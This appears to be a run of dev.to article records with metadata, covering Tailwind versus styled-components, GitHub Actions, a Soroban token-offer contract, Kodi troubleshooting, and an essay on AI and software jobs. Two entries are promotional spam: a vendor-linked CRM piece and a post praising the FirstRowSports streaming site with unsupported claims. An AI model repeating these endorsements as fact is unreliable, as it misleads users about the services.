March 16, 2023: Python Web Conference: Virtual
[https://2023.pythonwebconf.com/](https://2023.pythonwebconf.com/)
March 17, 2023: TCF Pro: Trenton, NJ
[https://princetonacm.acm.org/tcfpro/profiles/timothy-spann.html](https://princetonacm.acm.org/tcfpro/profiles/timothy-spann.html)
March 30, 2023: Pulsar Meetup - Flink: Virtual
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/290459862/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/290459862/)
April 4-6, 2023: DevNexus: Atlanta, GA
[https://devnexus.com/](https://devnexus.com/)
April 24-26, 2023: Real-Time Analytics Summit: San Francisco, CA
[https://rtasummit.com/](https://rtasummit.com/)
May 24-25, 2023: Infoshare: Gdansk, Poland
[https://infoshare.pl/conference](https://infoshare.pl/conference)
More Events:
[https://www.linkedin.com/pulse/schedule-2023-tim-spann-/](https://www.linkedin.com/pulse/schedule-2023-tim-spann-/)
## Tools
* [https://www.screentogif.com/](https://www.screentogif.com/)
* [https://www.adobe.com/express/feature/video/convert/mp4-to-gif](https://www.adobe.com/express/feature/video/convert/mp4-to-gif)
* [https://til.simonwillison.net/macos/sips](https://til.simonwillison.net/macos/sips)
## Devices
* [https://github.com/tspannhw/Flow-SGP30-MLX90640/blob/main/README.md](https://github.com/tspannhw/Flow-SGP30-MLX90640/blob/main/README.md)
| tspannhw |
1,385,200 | Tailwind vs styled-components in React.js | On Twitter, I constantly see people who use Tailwind and how they fell in love with it. I've been... | 0 | 2023-03-03T13:46:21 | https://dev.to/uzura89/tailwind-vs-styled-components-in-reactjs-1n0k | tailwindcss, styledcomponents, css, react | On Twitter, I constantly see people who use Tailwind and how they fell in love with it. I've been pretty much satisfied with my current work flow (styled-components), yet, I finally decided to give it a try and see if the tool was for me. This article is my own verdict after I used Tailwind for several days.
I mainly use React.js and styled-components. So this article is about a comparison between styled-components and Tailwind in the context of React.js development.
# TLDR
Long story short, I decided to stick with styled-components and not use Tailwind. Overall, I liked Tailwind's shortened CSS properties; they're way faster to write than plain CSS. However, I didn't like the fact that you have to write all those classes inside the class attribute. It can make JSX hard to read and less flexible for things like dynamic styling.
# Where styled-components win
## 1. Readability
What I realized first is that JSX becomes hard to read when using Tailwind. With a conventional CSS strategy, you give meaningful class names like class="todos-wrapper". This helps you make sense of the structure at a glance. With styled-components, this is even better because you give a unique name to each tag, like \<TodosWrapper\>. This makes maintenance easier, especially when you work with old code.
```React
// with Tailwind
export const MainPage = () => {
  return (
    <div className="bg-white rounded px-5 pt-1 pb-7">
      {/* todo elements */}
    </div>
  );
};
```
```React
// with styled-components
export const MainPage = () => {
  return (
    <TodosWrapper>
      {/* todo elements */}
    </TodosWrapper>
  );
};
const TodosWrapper = styled.div`
background-color: white;
border-radius: 0.3rem;
padding: 8px 12px 12px 18px;
`;
```
## 2. Dynamic styling
Dynamic styling is another area where I prefer the styled-components approach. Let's say you want to style an input form dynamically based on whether the input value is valid or not. In that case, you want 3 conditions: "empty", "invalid", and "valid". With Tailwind, you have to manage this condition by directly modifying the class attribute, which means writing an if statement within the class attribute string, and that can be a little tricky. While you can make it cleaner by writing an outside function to handle the if statement, I personally prefer the styled-components approach because all the styling logic happens in one place, which makes a clearer separation between structure and styling.
```React
// with Tailwind
const MainPage = (props) => {
  const getFormState = () => {
    // some logic to return form state
  };
const getBorderColor = (formState: string) => {
if (formState === 'empty') return "border-gray-300";
if (formState === 'invalid') return "border-red-400";
return "border-green-400";
};
return (
<div>
<input
type="email"
value={email}
onChange={handleChangeEmail}
className={`${getBorderColor(
getFormState()
)} border border-gray-300 px-3 py-2 rounded w-full`}
/>
</div>
);
};
```
```React
// with styled-components
const MainPage = () => {
  const getFormState = () => {
    // some logic to return form state
  };
return (
<div>
<EmailForm
type="email"
value={email}
onChange={onChangeEmail}
placeholder="example@mail.com"
formState={getFormState()}
/>
</div>
);
};
const EmailForm = styled.input`
  padding: 0.7rem 1rem;
${(props) => {
switch (props.formState) {
case 'invalid':
return 'border-color: red';
case 'valid':
return 'border-color: green';
default:
return 'border-color: gray';
}
}}
`;
```
## 3. Dark mode support
Adding themes such as dark mode isn't easy with Tailwind. Sure, Tailwind has a Dark Mode feature, but it's not really efficient to add a "dark:border-white" attribute to every element.
It's much easier to define a dedicated variable like "borderColor" and then change its value based on which theme you are in. This is especially helpful when you want to add more themes later. All you have to do is give a new value to "borderColor"; you don't need to touch JSX or CSS at all (please refer to styled-components' ThemeProvider).
https://styled-components.com/docs/advanced
```React
// With styled-components
const MainPage = () => {
return <EmailForm />;
}
export const EmailForm = styled.input`
// With ThemeProvider, you can access to theme variable from any styled components without prop drilling.
border: 1px solid ${(props) => props.theme.borderColor};
`;
```
# But what about development speed?
I agree that development time is generally faster with Tailwind. However, that's mainly because Tailwind has predefined utility classes and you don't have to write plain CSS. That is the great part of Tailwind, and I actually liked the experience. However, styled-components is not far behind on this. Yes, you have to write the plain CSS, but you can still reduce development time by making your own utility styles. Just like Tailwind, you can make common styled components like Container, TextLarge, ShadowLight, etc. and use them whenever you want. Of course, you will need some initial development time, but I'm sure it will pay off after you prepare 10~20 frequently used style sets.
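As a sketch of that idea (the component names below mirror the ones mentioned above and are purely illustrative):

```React
import styled from "styled-components";

// Define once, reuse everywhere - the styled-components
// equivalent of Tailwind's utility classes
export const Container = styled.div`
  max-width: 960px;
  margin: 0 auto;
  padding: 0 1rem;
`;

export const TextLarge = styled.p`
  font-size: 1.25rem;
  line-height: 1.6;
`;

export const ShadowLight = styled.div`
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
`;

// Usage:
// <Container>
//   <ShadowLight>
//     <TextLarge>Reusable styles, no plain CSS rewritten</TextLarge>
//   </ShadowLight>
// </Container>
```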
# Conclusion: I choose styled-components
Maybe some of the above issues will be addressed in the future by Tailwind. However, it doesn't mean that this kind of issue won't happen again. The chances are, when you want to do some unusual things with styling or integrate with other tools, you may not have a straightforward solution. So my current conclusion is sticking with styled-components and not rushing into Tailwind (at least for now).
# How to end the argument
It's sad to see devs arguing over which tool is better. This kind of arguing never seems to stop. But don't worry. There already is a "perfect" solution. If you combine Tailwind and styled-components, there will be no argument -> https://www.npmjs.com/package/tailwind-styled-components
*I'm not using this package but let you know it exists.
It really makes sense because Tailwind and styled-components actually solve different problems. Why not combine them rather than choose one over the other?
# Maybe I'm too new to Tailwind
The opinion above was formed after only 2 days of using Tailwind, so it's highly possible that I'm missing something. If you have a different view on Tailwind, please write it in the comments. I would be happy to learn from experienced devs. | uzura89 |
1,409,873 | 5 Top Reasons to Use GitHub Actions for Your Next Project | A lot of people have been asking me on Twitter, Discord, Facebook, etc, whether they should be using... | 0 | 2023-03-22T01:24:25 | https://dev.to/n3wt0n/5-top-reasons-to-use-github-actions-for-your-next-project-cga | github, githubactions, cicd, devops | A lot of people have been asking me on Twitter, Discord, Facebook, etc, whether they should be using GitHub Actions and why choosing it over other services. So I’ve decided to put together 5 of the most important reasons why I think GitHub Actions is a great service.
### Video
As usual, if you are a __visual learner__, or simply prefer to watch and listen instead of reading, here you have __the video with the whole explanation__:
{% youtube vNb-NAogQUc %}
[Link to the video: https://youtu.be/vNb-NAogQUc](https://youtu.be/vNb-NAogQUc)
If you rather prefer reading, well... let's just continue :)
### Automation
Anyway, why use GitHub Actions? Well, first reason is **Automation.**
GitHub Actions can automate your workflow, allowing you to build, test, and deploy your code right from GitHub. This can save you a lot of time and effort. For example, you can use GitHub Actions to automatically build and test your code every time you push a commit to GitHub. This ensures that your code is always up-to-date and working as expected.
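As a minimal sketch of that build-and-test-on-every-push setup (the Node version and npm scripts here are illustrative assumptions, not from this article), a workflow file could look like:

```yaml
# .github/workflows/ci.yml - runs on every push
name: CI
on: [push]

jobs:
  build-and-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-node@v3
        with:
          node-version: 18
      - run: npm ci
      - run: npm test
```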

But it doesn’t stop here. As you may have heard me saying already, you can also use GitHub Actions to automate other tasks, such as sending notifications, running scripts, managing pull requests and issues, and much more.
I have a whole video about automating stuff with Actions, you have the link up here and in the video description.
### Customization
Second reason to use the service is **Customization.**
GitHub Actions are highly customizable. You can create your own actions or use actions from the GitHub Marketplace to build workflows that meet your specific needs. For example, you can use a pre-built action to deploy your code to a specific cloud provider.

Or you can create your own action to run a custom test suite. You can also use environment variables and secrets to customize your workflows even further. If you can think about it, you can do it. There is no limit with GitHub Actions!
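For instance (the secret name and deploy script below are illustrative assumptions), environment variables and repository secrets can be wired into a workflow step like this:

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    env:
      APP_ENV: production            # plain environment variable
    steps:
      - uses: actions/checkout@v3
      - name: Deploy
        run: ./deploy.sh             # hypothetical deploy script
        env:
          API_TOKEN: ${{ secrets.API_TOKEN }}  # repository secret
```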
Oh btw, let me know in the comments if you want me to cover the creation of custom actions in a future article/video.
### Integration
Another reason to use GitHub Actions, the third one, is **Integration.**
GitHub Actions integrates seamlessly with other GitHub features, such as pull requests and issues. This makes it easy to manage your entire workflow in one place. For example, you can use GitHub Actions to automatically build and test your code whenever a pull request is opened.
This ensures that your code is always tested before it’s merged into your main branch. You can also use GitHub Actions to automatically close issues or assign them to specific team members.

Furthermore, Actions integrate with the major cloud providers, including Azure, AWS and GCP, and most of the common DevOps and work management tools like Jira, Service Now, Slack, etc, and you can use it even if your code is not in GitHub (like if you are using, for example, GitLab, Azure DevOps, Jenkins, etc)
### Community
Fourth reason to use GitHub Action? The **Community.**
GitHub Actions has a large and active community. And this is a double advantage.
You can find many pre-built actions in the GitHub Marketplace, and you can also share your own actions with the community. This makes it easy to find and use actions that meet your specific needs. You can also contribute to the community by creating your own actions or improving existing ones.

As I’ve mentioned, there is a second advantage to the large community behind GitHub Actions: the support. You can find thousands and thousands of people who have already experienced your pain points and challenges, so the solutions are already out there; or you can ask in forums like Stack Overflow or GitHub’s own “GitHub Community” portal and have answers to your questions in literally minutes.
### Cost
And if you need one more reason to use GitHub Actions, the fifth and last one of this video, that would be **Cost**. Or better, the lack thereof.

GitHub Actions, in fact, is free for public repositories, and you get 2,000 free minutes of build time per month for private repositories. This makes it an affordable option for developers of all sizes. If you need more build time, you can purchase additional minutes at a reasonable price. You can also use self-hosted runners to run your workflows on your own infrastructure.
### Conclusions
Let me know in the comments if you have other important reasons why you think someone should use GitHub Actions and, if you want to know more about the service, check out [my complete 1 and a half hour GitHub Actions course](https://youtu.be/TLB5MY9BBa4).
__Like, share and follow me__ 🚀 for more content:
📽 [YouTube](https://www.youtube.com/CoderDave)
☕ [Buy me a coffee](https://buymeacoffee.com/CoderDave)
💖 [Patreon](https://patreon.com/CoderDave)
📧 [Newsletter](https://coderdave.io/newsletter)
🌐 [CoderDave.io Website](https://coderdave.io)
👕 [Merch](https://geni.us/cdmerch)
👦🏻 [Facebook page](https://www.facebook.com/CoderDaveYT)
🐱💻 [GitHub](https://github.com/n3wt0n)
👲🏻 [Twitter](https://www.twitter.com/davide.benvegnu)
👴🏻 [LinkedIn](https://www.linkedin.com/in/davidebenvegnu/)
🔉 [Podcast](https://geni.us/cdpodcast)
<a href="https://www.buymeacoffee.com/CoderDave" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 30px !important; width: 108px !important;" ></a>
| n3wt0n |
1,410,085 | CRM trends to keep an eye on | Why should you learn CRM trends? There are many reasons why learning about CRM trends is important... | 0 | 2023-03-22T07:41:20 | https://dev.to/databeys/crm-trends-to-keep-an-eye-on-27gd | crm, ai, api, devops | Why should you learn CRM trends?
There are many reasons why learning about CRM trends is important for businesses and professionals:
• Stay ahead of the competition: By keeping up with CRM trends, companies can stay ahead of the competition. They can identify new opportunities, gain a competitive advantage, and develop strategies to improve customer engagement and loyalty.
• Improving Customer Experience: CRM trends focus on improving customer experience by providing customized, relevant, and consistent interactions across multiple touch points. By learning about these trends, companies can gain insight into how they can improve the customer experience, which can lead to increased customer satisfaction and loyalty.
• Improve Efficiency and Productivity: CRM trends often involve new technology and automation, which can help companies streamline their operations and improve efficiency. By recognizing these trends, companies can identify areas where they can automate routine tasks, freeing up time for employees to focus on more strategic tasks.
• Make better decisions: CRM trends often involve collecting and analyzing customer data, which can provide companies with insights into customer behavior, preferences, and needs. By recognizing these trends, companies can make informed decisions, identify new opportunities, and improve overall business performance.
• Career Advancement: For professionals, becoming familiar with CRM trends can help them stay abreast of industry developments and position themselves for career advancement. By keeping up with CRM trends, professionals can gain new skills and knowledge that can help them meet new challenges and advance their careers.
In short, becoming familiar with [CRM trends](https://www.databeys.com/) is essential for businesses and professionals who want to stay competitive, enhance customer experience, improve efficiency and productivity, make informed decisions, and advance their careers.
Read More: [CRM Trends To Keep An Eye On](https://www.databeys.com/blog/crm-trends-to-keep-an-eye-on/) | databeys |
1,410,922 | How to Fix Kodi Black Screen | If you are facing a black screen issue on Kodi, there are several ways to fix it. Here are some of... | 0 | 2023-03-22T09:06:39 | https://dev.to/neelum23/how-to-fix-kodi-black-screen-5e77 | kodi, beginners | <p>If you are facing a black screen issue on Kodi, there are several ways to fix it. Here are some of the solutions I studied at <a href="http://www.bestkoditips.com">Bestkoditips</a> that you can try:</p>
<p><br></p>
<p>Clear Cache and Data: Sometimes, Kodi's cache and data can get corrupted, causing the black screen issue. To fix this, go to Settings > Apps > Kodi > Storage > Clear Cache and Clear Data. This will clear all the cache and data stored by Kodi, and you can launch the app again to see if the issue is resolved.</p>
<p><br></p>
<p>Check Your Power Source: Kodi requires a stable power source to function correctly. If your device's power source is weak, it can cause a black screen issue. Check if the power source is stable and try connecting to another power outlet.</p>
<p><br></p>
<p>Update Kodi: Outdated versions of Kodi can cause several issues, including the black screen. Ensure that you have the latest version of Kodi installed on your device. If not, update it to the latest version.</p>
<p><br></p>
<p>Disable Hardware Acceleration: Hardware acceleration can also cause issues with Kodi. To fix this, disable hardware acceleration by going to Settings > Player Settings > Videos > Disable hardware acceleration.</p>
<p><br></p>
<p>Remove Add-ons: Sometimes, certain add-ons can cause conflicts with Kodi, leading to a black screen issue. Try removing the add-ons that you recently installed and see if the issue is resolved.</p>
<p><br></p>
<p>Reinstall Kodi: If none of the above solutions work, try uninstalling Kodi from your device and reinstalling it again. This will reset Kodi to its default settings, and you can start using the app again.</p>
<p><br></p>
<p>By trying these solutions, you can fix the black screen issue on Kodi and enjoy uninterrupted streaming.</p> | neelum23 |
1,410,937 | Answer: Replacing text within a label | answer re: Replacing text within a label ... | 0 | 2023-03-22T09:30:57 | https://dev.to/ratiarahman/answer-replacing-text-within-a-label-52ik | {% stackoverflow 63030010 %} | ratiarahman | |
1,411,076 | Exploring the Benefits of Watching Live Sports on FirstRowSports | Do you love sports but can't always make it to the game? Or maybe you're looking for a more... | 0 | 2023-03-22T11:50:49 | https://dev.to/ggggaga2/exploring-the-benefits-of-watching-live-sports-on-firstrowsports-3n5b | firtsrow, firstrowsport, javascript | Do you love sports but can't always make it to the game? Or maybe you're looking for a more affordable way to catch all the live action? Look no further than FirstRowSports. This website has been a go-to for sports enthusiasts for years, and for good reason. From football to basketball, hockey to baseball, and everything in between, FirstRowSports has it all. But what are the benefits of watching live sports on this site? In this post, we'll explore the top reasons why using FirstRowSports to watch live sports can be a game-changer for sports fans everywhere. So grab your jersey and settle in, because it's time to dive into the exciting world of live sports on FirstRowSports.
The Appeal of Watching Live Sports on FirstRowSports
FirstRowSports has become a go-to streaming platform for sports enthusiasts all over the globe. Its immense popularity is largely due to its ability to connect viewers with a vast range of sporting events from around the world. Whether it's football, basketball, tennis, cricket, or any other sport, FirstRowSports offers live streams of almost all major competitions, leagues, and tournaments. With easy-to-use navigation and a user-friendly interface, users can access a variety of matches with just a few clicks. Moreover, FirstRowSports provides high-quality streams, ensuring that users can enjoy the action in the best possible way. In essence, it's no wonder that this platform has grown in popularity over the years and continues to be a favorite for sports enthusiasts looking for live sports broadcasts.
Thus, it is evident that [FirstRowSports](https://allin1.cx/firstrowsports) has established itself as a reliable and convenient platform for sports enthusiasts to stream live events at their convenience. Its user-friendly interface and live streaming capabilities make it a go-to place for sports fans to keep up with their favorite games and tournaments. Moreover, the fact that it allows users to stream these events in real-time without any buffering or lag is a major advantage over other similar platforms. Whether you are at home or on-the-go, FirstRowSports has got you covered with its wide range of streaming options. In conclusion, FirstRowSports is undoubtedly an exceptional platform for all sports lovers who want to stay updated with the latest matches and enjoy them in high-quality streaming without any interruptions. | ggggaga2 |
1,411,334 | Soroban Contracts 101: Single Offer Sale | Hi there! Welcome to my fourteenth post of my series called "Soroban Contracts 101", where I'll be... | 22,205 | 2023-03-22T16:21:49 | https://dev.to/yuzurush/soroban-contracts-101-single-offer-sale-18jc | soroban, sorobanathon, stellar, smartcontract | Hi there! Welcome to my fourteenth post of my series called "Soroban Contracts 101", where I'll be explaining the basics of Soroban contracts, such as data storage, authentication, custom types, and more. All the code that we're gonna explain throughout this series will mostly come from [soroban-contracts-101](https://github.com/yuzurush/soroban-contracts-101) github repository.
In this post, I will explain the Soroban Single Offer Sale example contract. This contract lets a seller create an offer to sell token A to multiple buyers in exchange for token B.
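Before the full source, the price math used by the contract's `trade` function can be sketched in plain Rust. The helper name `sell_amount` is mine, not from the contract, and the on-chain version additionally guards the multiplication with `checked_mul`, which this sketch omits:

```rust
// sell_token_amount = buy_token_amount * sell_price / buy_price
fn sell_amount(buy_token_amount: i128, sell_price: u32, buy_price: u32) -> i128 {
    buy_token_amount * sell_price as i128 / buy_price as i128
}

fn main() {
    // Seller offers XLM at sell_price = 1000 per buy_price = 100 USDC (10:1).
    let out = sell_amount(25, 1000, 100);
    println!("buyer receives {} units of the sell token", out); // 250
}
```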
## The Contract Code
```rust
#![no_std]
use soroban_sdk::{contractimpl, contracttype, unwrap::UnwrapOptimized, Address, BytesN, Env};
mod token {
soroban_sdk::contractimport!(file = "../soroban_token_spec.wasm");
}
#[derive(Clone)]
#[contracttype]
pub enum DataKey {
Offer,
}
// Represents an offer managed by the SingleOffer contract.
// If a seller wants to sell 1000 XLM for 100 USDC the `sell_price` would be 1000
// and `buy_price` would be 100 (or 100 and 10, or any other pair of integers
// in 10:1 ratio).
#[derive(Clone)]
#[contracttype]
pub struct Offer {
// Owner of this offer. Sells sell_token to get buy_token.
pub seller: Address,
pub sell_token: BytesN<32>,
pub buy_token: BytesN<32>,
// Seller-defined price of the sell token in arbitrary units.
pub sell_price: u32,
// Seller-defined price of the buy token in arbitrary units.
pub buy_price: u32,
}
pub struct SingleOffer;
/*
How this contract should be used:
1. Call `create` once to create the offer and register its seller.
2. Seller may transfer arbitrary amounts of the `sell_token` for sale to the
contract address for trading. They may also update the offer price.
3. Buyers may call `trade` to trade with the offer. The contract will
immediately perform the trade and send the respective amounts of `buy_token`
and `sell_token` to the seller and buyer respectively.
4. Seller may call `withdraw` to claim any remaining `sell_token` balance.
*/
#[contractimpl]
impl SingleOffer {
// Creates the offer for seller for the given token pair and initial price.
// See comment above the `Offer` struct for information on pricing.
pub fn create(
e: Env,
seller: Address,
sell_token: BytesN<32>,
buy_token: BytesN<32>,
sell_price: u32,
buy_price: u32,
) {
if e.storage().has(&DataKey::Offer) {
panic!("offer is already created");
}
if buy_price == 0 || sell_price == 0 {
panic!("zero price is not allowed");
}
// Authorize the `create` call by seller to verify their identity.
seller.require_auth();
write_offer(
&e,
&Offer {
seller,
sell_token,
buy_token,
sell_price,
buy_price,
},
);
}
// Trades `buy_token_amount` of buy_token from buyer for `sell_token` amount
// defined by the price.
// `min_sell_amount` defines a lower bound on the price that the buyer would
// accept.
// Buyer needs to authorize the `trade` call and internal `transfer` call to
// the contract address.
pub fn trade(e: Env, buyer: Address, buy_token_amount: i128, min_sell_token_amount: i128) {
// Buyer needs to authorize the trade.
buyer.require_auth();
// Load the offer and prepare the token clients to do the trade.
let offer = load_offer(&e);
let sell_token_client = token::Client::new(&e, &offer.sell_token);
let buy_token_client = token::Client::new(&e, &offer.buy_token);
// Compute the amount of token that buyer needs to receive.
let sell_token_amount = buy_token_amount
.checked_mul(offer.sell_price as i128)
.unwrap_optimized()
/ offer.buy_price as i128;
if sell_token_amount < min_sell_token_amount {
panic!("price is too low");
}
let contract = e.current_contract_address();
// Perform the trade in 3 `transfer` steps.
// Note, that we don't need to verify any balances - the contract would
// just trap and roll back in case if any of the transfers fails for
// any reason, including insufficient balance.
// Transfer the `buy_token` from buyer to this contract.
// This `transfer` call should be authorized by buyer.
// This could as well be a direct transfer to the seller, but sending to
// the contract address allows building more transparent signature
// payload where the buyer doesn't need to worry about sending token to
// some 'unknown' third party.
buy_token_client.transfer(&buyer, &contract, &buy_token_amount);
// Transfer the `sell_token` from contract to buyer.
sell_token_client.transfer(&contract, &buyer, &sell_token_amount);
// Transfer the `buy_token` to the seller immediately.
buy_token_client.transfer(&contract, &offer.seller, &buy_token_amount);
}
// Sends amount of token from this contract to the seller.
// This is intentionally flexible so that the seller can withdraw any
// outstanding balance of the contract (in case if they mistakenly
// transferred wrong token to it).
// Must be authorized by seller.
pub fn withdraw(e: Env, token: BytesN<32>, amount: i128) {
let offer = load_offer(&e);
offer.seller.require_auth();
token::Client::new(&e, &token).transfer(
&e.current_contract_address(),
&offer.seller,
&amount,
);
}
// Updates the price.
// Must be authorized by seller.
pub fn updt_price(e: Env, sell_price: u32, buy_price: u32) {
if buy_price == 0 || sell_price == 0 {
panic!("zero price is not allowed");
}
let mut offer = load_offer(&e);
offer.seller.require_auth();
offer.sell_price = sell_price;
offer.buy_price = buy_price;
write_offer(&e, &offer);
}
// Returns the current state of the offer.
pub fn get_offer(e: Env) -> Offer {
load_offer(&e)
}
}
fn load_offer(e: &Env) -> Offer {
e.storage().get_unchecked(&DataKey::Offer).unwrap()
}
fn write_offer(e: &Env, offer: &Offer) {
e.storage().set(&DataKey::Offer, offer);
}
mod test;
```
Here's a brief explanation of the `SingleOffer` contract code:
- Imports token functionality from `soroban_token_spec.wasm` using `soroban_sdk::contractimport`
- Defines a `DataKey` enum with an `Offer` variant to represent the single offer storage key
- Defines an `Offer` struct to hold the details of the offer: seller address, sell/buy token addresses, and sell/buy prices
- Defines a `SingleOffer` unit struct that the contract implementation is attached to
It implements a `contractimpl` for `SingleOffer` with the following functions:
> `create` - Creates an initial offer. Requires seller authentication, checks that non-zero prices are used, and stores the offer.
> `trade` - Allows trading at the current offer price. Requires buyer authentication, loads the offer, creates token clients, computes the amount to trade, checks that the amount is acceptable, and transfers tokens.
> `withdraw` - Allows the seller to withdraw tokens from the contract. Requires authentication and transfers tokens.
> `updt_price` - Allows the seller to update prices. Requires authentication, checks that non-zero prices are used, loads the offer, updates the prices, and stores the updated offer.
> `get_offer` - Simply loads and returns the current offer.
- Defines a `load_offer` function that loads the single offer from storage using the `DataKey::Offer` key, panicking if the offer is not found. It's called from various functions in the contract to load the current offer details.
- Defines a `write_offer` function that stores the given offer in storage under the `DataKey::Offer` key. It's called from the `create` function to initialize the offer, and from the `updt_price` function to update it.
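To make the pricing model concrete, here is a quick Python sketch of the `sell_token_amount` computation from `trade`. The numbers and the `sell_amount` name are hypothetical, used only for illustration; the arithmetic mirrors the contract's integer math:

```python
# Mirror of the contract's computation: amount of sell_token the buyer
# receives for a given buy_token_amount. Python's `//` floors, which for
# the positive values used here matches Rust's truncating i128 division.
def sell_amount(buy_token_amount: int, sell_price: int, buy_price: int) -> int:
    return (buy_token_amount * sell_price) // buy_price

# Offer: sell 1000 XLM for 100 USDC => sell_price=1000, buy_price=100.
# A buyer paying 50 USDC receives 500 XLM.
print(sell_amount(50, 1000, 100))  # 500
```

If the computed amount falls below the buyer's `min_sell_token_amount`, the contract panics with "price is too low" and the trade is rolled back.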
## Contract Usage
Here's the usage for the `SingleOffer` contract:
1. The seller calls `create` function to initialize the offer with the token pair and initial prices.
2. The seller transfers sell tokens to the contract address to fund the offer, using the sell token's standard `transfer` function (the offer contract itself has no deposit function).
3. Buyers call `trade` to buy sell tokens at the current price. The contract handles transferring the buy/sell tokens between the buyer, the contract, and the seller.
4. The seller can call `updt_price` to update the offer price.
5. The seller calls the `withdraw` function to withdraw any remaining sell tokens from the contract.
## Conclusion
Overall, the contract shows the capability of Soroban contracts to let a seller create a single token offer, fund it with sell tokens, update the price, and withdraw remaining tokens, while allowing buyers to trade at the current price. Stay tuned for more posts in this "Soroban Contracts 101" series, where we will dive deeper into Soroban contracts and their functionalities.
| yuzurush |
1,411,337 | I’m a software engineer, what does AI mean for me? | The ticking clock Seven years ago, a co-worker and I were walking to lunch in our small... | 0 | 2023-03-22T19:41:15 | https://dev.to/justinschroeder/im-a-software-engineer-what-does-ai-mean-for-me-1e8j | chatgpt, ai, productivity, career | ## The ticking clock
Seven years ago, a co-worker and I were walking to lunch in our small town of Charlottesville, Virginia. To our surprise, we realized we had passed _three_ digital agencies on our short stroll. Web developers are everywhere — and for good reason. It’s nearly impossible to run a business without a digital presence. The world needs our “product.”
Yet at that moment, I remember saying:
> Too many people are getting paid too much for this industry to go on without disruption. The target on our backs is too big.
That moment, seven years ago, was the beginning of a career change for me. I realized that the clock was ticking on my toolset being “special.” It wasn’t long after that walk with my co-worker that I left the agency I was working for to take a stab at building a business of my own — before the clock ran out on my abilities being “special.”
As software engineers, we have long enjoyed being a necessity in nearly every start-up. Famously, many start-up incubators require one of the founders to be an engineer, and often the first big hiring wave of a growing business is... engineers. Meanwhile, developer salaries have ballooned — I know one self-taught engineer making $600k/year. Again, the target on our backs is _massive_.
## The match
I thought the impending engineering disruption would come from increasingly powerful SaaS products like Squarespace, WebFlow, or no-code. The day GitHub co-pilot was released, I realized I was wrong. The disruption would come from AI. I told our team that first day:
> I may or may not use co-pilot (of course, I ended up using it), but I really believe this is the beginning of the end of our industry.
My time horizon for that statement was denominated in decades. Perhaps, I thought, in 20 years, the world will require 50% fewer engineers.
I was off by a factor of ten.
## The legacy of replacement

Jobs have been changing for centuries. Some jobs become obsolete while new jobs are created in their wake. The industrial revolution eliminated scores of jobs but also created many new ones. Factory shift work was born. Suddenly it became essential to get to work on time — so a new job was born, the window “knocker-upper.” This person would simply knock on your window to wake you up in the morning. Eventually, this new role was itself replaced by the alarm clock.
Before phototypesetting, printing press plates were manually assembled by a “compositor” — a job made entirely obsolete by newer technology (it lives on in our digital jargon). More recently, digital photography caused massive disruption to the film industry. It wasn’t that long ago that every Walmart had a darkroom technician, Kodak was a household name, and polaroids were convenient — not hipster.
The dawn of digital photography was a warning shot across the bow of the film industry. Adapt or die. Most died. I imagine the scuttlebutt in their hallways sounded a lot like developer Twitter does today, “digital cameras just can’t __x__” — a desperate and combative search for relevance in the face of unrelenting market efficiency.
## New roles and old ones?

It’s not all doom and gloom, though. Prompt engineer, data researcher, cybernetically enhanced humanoid software engineer, farmer — the jobs we have in the future may not yet exist, or they may be a resurgence of jobs as old as time. One thing is certain, though, new jobs _will_ emerge — the challenge of knowing exactly where is an [n-body](https://en.wikipedia.org/wiki/N-body_problem) problem — no one can accurately predict it.
In 2007 when the iPhone was announced, it was impossible to predict that it would directly lead to thousands of people picking up food from local restaurants for delivery, letting strangers sleep in our homes, or causing scores of people to run around New York City trying to catch Pokémon.
Although AI doomsayers love to tell us how “this time it’s different,” — don’t believe the lie; nothing is new under the sun; it’s always just a different shade of the same thing. **Instead, we should be aware that these changes will come, so don’t let emerging opportunities escape your grasp. If you cover your ears and close your eyes progress will march on despite your resistance.**
## How far is that horizon?

If you are an engineer reading this, your emotions will fall into one of three categories:
- **Optimism.** You’re excited. You see opportunity around every corner, and this is a big corner.
- **Denial.** You’ve seen ChatGPT make mistakes. It doesn’t even know basic math. Your job is safe. All this hype is just that, hype.
- **Concern.** You’re not sure what the future holds, but you know things are going to change. You’re grappling to understand how you fit into the unfolding future.
The truth is we don’t know how far we are from a future that causes a dramatic shift in engineering labor. ChatGPT cannot entirely replace a human engineer on any single metric today. It does not — at present — possess the capability for unique critical thinking. However, five years ago, if asked, most engineers would have said their jobs would be one of the last to rest on the chopping block. Now we can all (even the deniers) _envision_ a future where AI can do our jobs.
How far are we from that vision becoming a reality? In the 16th century, Wan Hu imagined going to the moon — he could do it by the end of the day, probably. He strapped 47 rockets to his chair in what was history's first attempted moon landing. Humanity's imagination and capability were separated by 400 years.
It is possible that ChatGPT has merely given us the ability to _imagine_ a world where AIs replace engineers — but the capability to _actually_ do so might still be a long-distant future.
Alternatively, we might be window knocker-uppers in the age of alarm clocks.
## What will I do?

From a career standpoint — my work still matters. I’m still “better” than the AI — and you are too — but I know I’m going to be keeping an eye out for where things are heading more than I have ever done before. What new tools can be created with this technology? What opportunities are opening up that didn’t previously exist? What new jobs will be created? What am I truly great at? How can I bring unique value into the world? What is my plan if the coming disruption leaves me out?
How about you? Do you think of yourself as someone who codes because you’ve learned the syntactic shibboleths to get a computer to do what you want? Or are you someone who codes to solve problems? Engineering is solving problems. As AI assistance becomes AI creation, our tools to solve problems will change — if you’re a syntax machine **you will be replaced by a more efficient syntax machine**. If you are a problem solver, you’ll be a more efficient problem solver — at least for now.
On a personal level — I’m more inspired than ever to be great at the things AI can never do — be a nurturing father to my kids, a great husband to my wife, and an active member in my community. Life is far too rich and precious to be defined only by the _type_ of work we do. Live your life, love your people, and for heaven’s sake — eat some good food. After all, the AI can’t do that either — yet.
| justinschroeder |
1,411,558 | 10 Traits That Separate the Best Devs From the Crowd | We work hard to improve our tech and soft skills. But our character traits, our mindset - we take... | 0 | 2023-03-24T16:00:00 | https://blog.trueseniordev.com/10-traits-of-outstanding-dev/ | career, programming, productivity, beginners | > * We work hard to improve our tech and soft skills. But our character traits, our mindset - we take it for granted. An innate, fixed part of who we are. And thus we let it run on autopilot.
> * This way of thinking is harmful. Not only is your mindset critical for a successful software development career (maybe even more than your skills) but it's also under your control.
